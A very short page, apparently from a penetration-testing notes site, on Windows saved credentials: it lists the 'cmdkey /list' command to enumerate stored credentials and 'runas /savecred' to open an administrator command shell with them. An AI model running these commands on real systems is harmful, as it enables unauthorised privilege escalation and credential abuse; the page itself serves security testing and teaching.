githubEdit

Saved Windows Credentials

Command:

cmdkey /list

If you find credentials, you can use them like:

runas /savecred /user:admin cmd.exe

Last updated